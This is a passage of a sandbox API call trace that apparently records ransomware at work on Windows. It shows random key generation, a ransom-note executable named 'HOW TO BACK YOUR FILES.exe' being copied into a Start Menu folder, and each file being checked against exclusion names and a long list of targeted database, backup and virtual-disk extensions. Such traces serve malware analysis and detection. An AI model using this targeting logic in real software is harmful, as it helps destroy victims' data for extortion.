returned 0x12c [0066.987] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3021) returned 1 [0066.987] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0066.988] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0066.988] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0066.988] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.988] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.989] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.991] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.992] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.992] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.993] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools") returned="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools" [0066.993] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0066.993] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2600 | out: hHeap=0x2b0000) returned 1 [0066.993] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools") returned 83 [0066.993] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools" | out: lpString1="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools") returned="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools" [0066.993] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.993] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.993] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.993] GetLastError () returned 0x0 [0066.993] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0066.993] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0066.994] CloseHandle (hObject=0x154) returned 1 [0066.994] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0066.994] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.994] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77f53bd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x4bb7f760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bb7f760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0066.994] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.994] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.994] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.994] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77f53bd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x4bb7f760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bb7f760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.994] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.994] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0066.994] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.994] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.994] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77fec150, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xc119ff40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc119ff40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xba1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Digital Certificate for VBA Projects.lnk", cAlternateFileName="DIGITA~1.LNK")) returned 1 [0066.994] lstrcmpiW (lpString1="Digital Certificate for VBA Projects.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.994] lstrcmpiW (lpString1="Digital Certificate for VBA Projects.lnk", lpString2="aoldtz.exe") returned 1 [0066.994] lstrcmpiW (lpString1="Digital Certificate for VBA Projects.lnk", lpString2=".") returned 1 [0066.994] lstrcmpiW (lpString1="Digital Certificate for VBA Projects.lnk", lpString2="..") returned 1 [0066.994] lstrcmpiW (lpString1="Digital Certificate for VBA Projects.lnk", lpString2="windows") returned -1 [0066.994] lstrcmpiW (lpString1="Digital Certificate for VBA Projects.lnk", lpString2="bootmgr") returned 1 [0066.994] lstrcmpiW (lpString1="Digital Certificate for VBA Projects.lnk", lpString2="temp") returned -1 [0066.994] lstrcmpiW (lpString1="Digital Certificate for VBA Projects.lnk", lpString2="pagefile.sys") returned -1 [0066.994] lstrcmpiW (lpString1="Digital Certificate for VBA Projects.lnk", lpString2="boot") returned 1 [0066.994] lstrcmpiW (lpString1="Digital Certificate for VBA Projects.lnk", lpString2="ids.txt") returned -1 [0066.994] lstrcmpiW (lpString1="Digital Certificate for VBA Projects.lnk", lpString2="ntuser.dat") returned -1 [0066.995] lstrcmpiW (lpString1="Digital Certificate for VBA Projects.lnk", lpString2="perflogs") returned -1 [0066.995] lstrcmpiW (lpString1="Digital Certificate for VBA Projects.lnk", lpString2="MSBuild") returned -1 [0066.995] lstrlenW (lpString="Digital Certificate for VBA Projects.lnk") returned 40 [0066.995] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\*") returned 85 [0066.995] lstrcpyW (in: lpString1=0x2cce4a8, lpString2="Digital Certificate for VBA Projects.lnk" | out: lpString1="Digital Certificate for VBA Projects.lnk") returned="Digital Certificate for VBA Projects.lnk" [0066.995] lstrlenW (lpString="Digital Certificate for VBA Projects.lnk") returned 40 [0066.995] lstrlenW (lpString="Ares865") returned 7 [0066.995] lstrcmpiW (lpString1="cts.lnk", lpString2="Ares865") returned 1 [0066.995] lstrlenW (lpString=".dll") returned 4 [0066.995] lstrcmpiW (lpString1="Digital Certificate for VBA Projects.lnk", lpString2=".dll") returned 1 [0066.995] lstrlenW (lpString=".lnk") returned 4 [0066.995] lstrcmpiW (lpString1="Digital Certificate for VBA Projects.lnk", lpString2=".lnk") returned 1 [0066.995] lstrlenW (lpString=".ini") returned 4 [0066.995] lstrcmpiW (lpString1="Digital Certificate for VBA Projects.lnk", lpString2=".ini") returned 1 [0066.995] lstrlenW (lpString=".sys") returned 4 [0066.995] lstrcmpiW (lpString1="Digital Certificate for VBA Projects.lnk", lpString2=".sys") returned 1 [0066.995] lstrlenW (lpString="Digital Certificate for VBA Projects.lnk") returned 40 [0066.995] lstrlenW (lpString="bak") returned 3 [0066.995] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0066.995] lstrlenW (lpString="ba_") returned 3 [0066.995] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0066.995] lstrlenW (lpString="dbb") returned 3 [0066.995] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0066.995] lstrlenW (lpString="vmdk") returned 4 [0066.995] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0066.995] lstrlenW (lpString="rar") returned 3 [0066.995] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0066.995] lstrlenW (lpString="zip") returned 3 [0066.995] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0066.995] lstrlenW (lpString="tgz") returned 3 [0066.995] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0066.995] lstrlenW (lpString="vbox") returned 4 [0066.995] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0066.995] lstrlenW (lpString="vdi") returned 3 [0066.995] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0066.995] lstrlenW (lpString="vhd") returned 3 [0066.995] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0066.995] lstrlenW (lpString="vhdx") returned 4 [0066.996] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0066.996] lstrlenW (lpString="avhd") returned 4 [0066.996] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0066.996] lstrlenW (lpString="db") returned 2 [0066.996] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0066.996] lstrlenW (lpString="db2") returned 3 [0066.996] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0066.996] lstrlenW (lpString="db3") returned 3 [0066.996] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0066.996] lstrlenW (lpString="dbf") returned 3 [0066.996] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0066.996] lstrlenW (lpString="mdf") returned 3 [0066.996] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0066.996] lstrlenW (lpString="mdb") returned 3 [0066.996] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0066.996] lstrlenW (lpString="sql") returned 3 [0066.996] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0066.996] lstrlenW (lpString="sqlite") returned 6 [0066.996] lstrcmpiW (lpString1="ts.lnk", lpString2="sqlite") returned 1 [0066.996] lstrlenW (lpString="sqlite3") returned 7 [0066.996] lstrcmpiW (lpString1="cts.lnk", lpString2="sqlite3") returned -1 [0066.996] lstrlenW (lpString="sqlitedb") returned 8 [0066.996] lstrcmpiW (lpString1="ects.lnk", lpString2="sqlitedb") returned -1 [0066.996] lstrlenW (lpString="xml") returned 3 [0066.996] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0066.997] lstrlenW (lpString="$er") returned 3 [0066.997] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0066.997] lstrlenW (lpString="4dd") returned 3 [0066.997] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0066.997] lstrlenW (lpString="4dl") returned 3 [0066.997] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0066.997] lstrlenW (lpString="^^^") returned 3 [0066.997] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0066.997] lstrlenW (lpString="abs") returned 3 [0066.997] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0066.997] lstrlenW (lpString="abx") returned 3 [0066.997] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0066.997] lstrlenW (lpString="accdb") returned 5 [0066.997] lstrcmpiW (lpString1="s.lnk", lpString2="accdb") returned 1 [0066.997] lstrlenW (lpString="accdc") returned 5 [0066.997] lstrcmpiW (lpString1="s.lnk", lpString2="accdc") returned 1 [0066.997] lstrlenW (lpString="accde") returned 5 [0066.997] lstrcmpiW (lpString1="s.lnk", lpString2="accde") returned 1 [0066.997] lstrlenW (lpString="accdr") returned 5 [0066.997] lstrcmpiW (lpString1="s.lnk", lpString2="accdr") returned 1 [0066.997] lstrlenW (lpString="accdt") returned 5 [0066.997] lstrcmpiW (lpString1="s.lnk", lpString2="accdt") returned 1 [0066.997] lstrlenW (lpString="accdw") returned 5 [0066.997] lstrcmpiW (lpString1="s.lnk", lpString2="accdw") returned 1 [0066.997] lstrlenW (lpString="accft") returned 5 [0066.997] lstrcmpiW (lpString1="s.lnk", lpString2="accft") returned 1 [0066.997] lstrlenW (lpString="adb") returned 3 [0066.997] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0066.997] lstrlenW (lpString="adb") returned 3 [0066.997] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0066.997] lstrlenW (lpString="ade") returned 3 [0066.997] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0066.997] lstrlenW (lpString="adf") returned 3 [0066.997] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0066.997] lstrlenW (lpString="adn") returned 3 [0066.997] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0066.997] lstrlenW (lpString="adp") returned 3 [0066.997] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0066.998] lstrlenW (lpString="alf") returned 3 [0066.998] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0066.998] lstrlenW (lpString="ask") returned 3 [0066.998] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0066.998] lstrlenW (lpString="btr") returned 3 [0066.998] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0066.998] lstrlenW (lpString="cat") returned 3 [0066.998] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0066.998] lstrlenW (lpString="cdb") returned 3 [0066.998] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0066.998] lstrlenW (lpString="ckp") returned 3 [0066.998] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0066.998] lstrlenW (lpString="cma") returned 3 [0066.998] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0066.998] lstrlenW (lpString="cpd") returned 3 [0066.998] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0066.998] lstrlenW (lpString="dacpac") returned 6 [0066.998] lstrcmpiW (lpString1="ts.lnk", lpString2="dacpac") returned 1 [0066.998] lstrlenW (lpString="dad") returned 3 [0066.998] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0066.998] lstrlenW (lpString="dadiagrams") returned 10 [0066.998] lstrcmpiW (lpString1="ojects.lnk", lpString2="dadiagrams") returned 1 [0066.998] lstrlenW (lpString="daschema") returned 8 [0066.998] lstrcmpiW (lpString1="ects.lnk", lpString2="daschema") returned 1 [0066.998] lstrlenW (lpString="db-journal") returned 10 [0066.998] lstrcmpiW (lpString1="ojects.lnk", lpString2="db-journal") returned 1 [0066.998] lstrlenW (lpString="db-shm") returned 6 [0066.998] lstrcmpiW (lpString1="ts.lnk", lpString2="db-shm") returned 1 [0066.998] lstrlenW (lpString="db-wal") returned 6 [0066.998] lstrcmpiW (lpString1="ts.lnk", lpString2="db-wal") returned 1 [0066.998] lstrlenW (lpString="dbc") returned 3 [0066.998] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0066.998] lstrlenW (lpString="dbs") returned 3 [0066.998] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0066.998] lstrlenW (lpString="dbt") returned 3 [0066.998] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0066.998] lstrlenW (lpString="dbv") returned 3 [0066.998] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0066.999] lstrlenW (lpString="dbx") returned 3 [0066.999] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0066.999] lstrlenW (lpString="dcb") returned 3 [0066.999] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0066.999] lstrlenW (lpString="dct") returned 3 [0066.999] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0066.999] lstrlenW (lpString="dcx") returned 3 [0066.999] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0066.999] lstrlenW (lpString="ddl") returned 3 [0066.999] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0066.999] lstrlenW (lpString="dlis") returned 4 [0066.999] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0066.999] lstrlenW (lpString="dp1") returned 3 [0066.999] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0066.999] lstrlenW (lpString="dqy") returned 3 [0066.999] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0066.999] lstrlenW (lpString="dsk") returned 3 [0066.999] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0066.999] lstrlenW (lpString="dsn") returned 3 [0066.999] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0066.999] lstrlenW (lpString="dtsx") returned 4 [0066.999] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0066.999] lstrlenW (lpString="dxl") returned 3 [0066.999] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0066.999] lstrlenW (lpString="eco") returned 3 [0066.999] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0066.999] lstrlenW (lpString="ecx") returned 3 [0066.999] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0066.999] lstrlenW (lpString="edb") returned 3 [0066.999] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0066.999] lstrlenW (lpString="epim") returned 4 [0066.999] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0066.999] lstrlenW (lpString="fcd") returned 3 [0066.999] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0066.999] lstrlenW (lpString="fdb") returned 3 [0066.999] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0066.999] lstrlenW (lpString="fic") returned 3 [0066.999] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0067.000] lstrlenW (lpString="flexolibrary") returned 12 [0067.000] lstrcmpiW (lpString1="Projects.lnk", lpString2="flexolibrary") returned 1 [0067.000] lstrlenW (lpString="fm5") returned 3 [0067.000] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0067.000] lstrlenW (lpString="fmp") returned 3 [0067.000] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0067.000] lstrlenW (lpString="fmp12") returned 5 [0067.000] lstrcmpiW (lpString1="s.lnk", lpString2="fmp12") returned 1 [0067.000] lstrlenW (lpString="fmpsl") returned 5 [0067.000] lstrcmpiW (lpString1="s.lnk", lpString2="fmpsl") returned 1 [0067.000] lstrlenW (lpString="fol") returned 3 [0067.000] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0067.000] lstrlenW (lpString="fp3") returned 3 [0067.000] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0067.000] lstrlenW (lpString="fp4") returned 3 [0067.000] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0067.000] lstrlenW (lpString="fp5") returned 3 [0067.000] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0067.000] lstrlenW (lpString="fp7") returned 3 [0067.000] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0067.000] lstrlenW (lpString="fpt") returned 3 [0067.000] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0067.000] lstrlenW (lpString="frm") returned 3 [0067.000] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0067.000] lstrlenW (lpString="gdb") returned 3 [0067.000] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0067.000] lstrlenW (lpString="gdb") returned 3 [0067.000] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0067.000] lstrlenW (lpString="grdb") returned 4 [0067.000] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0067.000] lstrlenW (lpString="gwi") returned 3 [0067.000] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0067.000] lstrlenW (lpString="hdb") returned 3 [0067.000] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0067.000] lstrlenW (lpString="his") returned 3 [0067.000] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0067.000] lstrlenW (lpString="ib") returned 2 [0067.000] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0067.000] lstrlenW (lpString="idb") returned 3 [0067.001] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0067.001] lstrlenW (lpString="ihx") returned 3 [0067.001] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0067.001] lstrlenW (lpString="itdb") returned 4 [0067.001] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0067.001] lstrlenW (lpString="itw") returned 3 [0067.001] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0067.001] lstrlenW (lpString="jet") returned 3 [0067.001] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0067.001] lstrlenW (lpString="jtx") returned 3 [0067.001] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0067.001] lstrlenW (lpString="kdb") returned 3 [0067.001] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0067.001] lstrlenW (lpString="kexi") returned 4 [0067.001] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0067.001] lstrlenW (lpString="kexic") returned 5 [0067.001] lstrcmpiW (lpString1="s.lnk", lpString2="kexic") returned 1 [0067.001] lstrlenW (lpString="kexis") returned 5 [0067.001] lstrcmpiW (lpString1="s.lnk", lpString2="kexis") returned 1 [0067.001] lstrlenW (lpString="lgc") returned 3 [0067.001] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0067.001] lstrlenW (lpString="lwx") returned 3 [0067.001] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0067.001] lstrlenW (lpString="maf") returned 3 [0067.001] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0067.001] lstrlenW (lpString="maq") returned 3 [0067.001] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0067.001] lstrlenW (lpString="mar") returned 3 [0067.001] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0067.001] lstrlenW (lpString="marshal") returned 7 [0067.001] lstrcmpiW (lpString1="cts.lnk", lpString2="marshal") returned -1 [0067.001] lstrlenW (lpString="mas") returned 3 [0067.001] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0067.001] lstrlenW (lpString="mav") returned 3 [0067.001] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0067.001] lstrlenW (lpString="maw") returned 3 [0067.001] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0067.001] lstrlenW (lpString="mdbhtml") returned 7 [0067.002] lstrcmpiW (lpString1="cts.lnk", lpString2="mdbhtml") returned -1 [0067.002] lstrlenW (lpString="mdn") returned 3 [0067.002] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0067.002] lstrlenW (lpString="mdt") returned 3 [0067.002] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0067.002] lstrlenW (lpString="mfd") returned 3 [0067.002] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0067.002] lstrlenW (lpString="mpd") returned 3 [0067.002] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0067.002] lstrlenW (lpString="mrg") returned 3 [0067.002] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0067.002] lstrlenW (lpString="mud") returned 3 [0067.002] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0067.002] lstrlenW (lpString="mwb") returned 3 [0067.002] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0067.002] lstrlenW (lpString="myd") returned 3 [0067.002] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0067.002] lstrlenW (lpString="ndf") returned 3 [0067.002] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0067.002] lstrlenW (lpString="nnt") returned 3 [0067.002] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0067.002] lstrlenW (lpString="nrmlib") returned 6 [0067.002] lstrcmpiW (lpString1="ts.lnk", lpString2="nrmlib") returned 1 [0067.002] lstrlenW (lpString="ns2") returned 3 [0067.002] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0067.002] lstrlenW (lpString="ns3") returned 3 [0067.002] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0067.002] lstrlenW (lpString="ns4") returned 3 [0067.002] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0067.002] lstrlenW (lpString="nsf") returned 3 [0067.002] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0067.002] lstrlenW (lpString="nv") returned 2 [0067.002] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0067.002] lstrlenW (lpString="nv2") returned 3 [0067.002] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0067.002] lstrlenW (lpString="nwdb") returned 4 [0067.002] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0067.002] lstrlenW (lpString="nyf") returned 3 [0067.003] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0067.003] lstrlenW (lpString="odb") returned 3 [0067.003] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0067.003] lstrlenW (lpString="odb") returned 3 [0067.003] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0067.003] lstrlenW (lpString="oqy") returned 3 [0067.003] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0067.003] lstrlenW (lpString="ora") returned 3 [0067.003] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0067.003] lstrlenW (lpString="orx") returned 3 [0067.003] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0067.003] lstrlenW (lpString="owc") returned 3 [0067.003] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0067.003] lstrlenW (lpString="p96") returned 3 [0067.003] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0067.003] lstrlenW (lpString="p97") returned 3 [0067.003] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0067.003] lstrlenW (lpString="pan") returned 3 [0067.003] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0067.003] lstrlenW (lpString="pdb") returned 3 [0067.003] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0067.003] lstrlenW (lpString="pdm") returned 3 [0067.003] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0067.003] lstrlenW (lpString="pnz") returned 3 [0067.003] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0067.003] lstrlenW (lpString="qry") returned 3 [0067.003] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0067.003] lstrlenW (lpString="qvd") returned 3 [0067.003] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0067.003] lstrlenW (lpString="rbf") returned 3 [0067.003] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0067.003] lstrlenW (lpString="rctd") returned 4 [0067.003] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0067.003] lstrlenW (lpString="rod") returned 3 [0067.003] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0067.003] lstrlenW (lpString="rodx") returned 4 [0067.003] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0067.003] lstrlenW (lpString="rpd") returned 3 [0067.004] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0067.004] lstrlenW (lpString="rsd") returned 3 [0067.004] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0067.004] lstrlenW 